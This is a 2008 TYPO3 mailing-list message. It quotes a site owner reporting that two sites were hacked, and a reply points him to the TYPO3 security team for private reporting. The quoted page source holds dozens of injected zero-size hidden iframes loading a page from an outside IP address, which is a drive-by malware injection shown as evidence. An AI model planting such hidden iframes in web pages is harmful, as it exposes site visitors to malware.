[TYPO3] Typo3 sites HACKED!
Niels Pardon
mail at niels-pardon.de
Thu Mar 20 15:20:20 CET 2008
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi Theo,
such Security issues should be communicated silently to the TYPO3
Security team:
http://typo3.org/teams/security/contact-us/
Greets,
Niels
Theo Kotey schrieb:
| Hi List
|
| Two of my Typo3-running website have been hacked. I am trying to figure
| out how but there is an unknown ip address 58.65.236.89 which belongs to
| HostFresh. Does anybody have an info on these guys?
|
| My website are quite slow and shows some error messages like
|
| Warning: Cannot modify header information - headers already sent by
| (output started at
| /home/micropro/public_html/typo3_src/t3lib/class.t3lib_timetrack.php:595)
| in /home/micropro/public_html/typo3_src/t3lib/class.t3lib_userauth.php
| on line 278
|
| When I debugg the site using Firebug this is what I get below
|
| ##########################################################################
|
| <html>
| <head>
| </head>
| <body _dragdropupload="true" onload="T3_onloadWrapper();">
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
| <iframe width="0" height="0" border="0"
| src="http://58.65.236.89/in3/index.php">
| </iframe>
|
| ##########################################################################
|
| I have no idea how the <iframe> tag got in there as I have never used it
|
| Regards
| Theo
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFH4nKNbZQLhmJMZbQRArrkAKC3G2maLr/OcK8OD9x2Iz7Urz5LAwCgx8h0
U349wofABZ4cGAPJm4DCjd8=
=BCtG
-----END PGP SIGNATURE-----
More information about the TYPO3-english
mailing list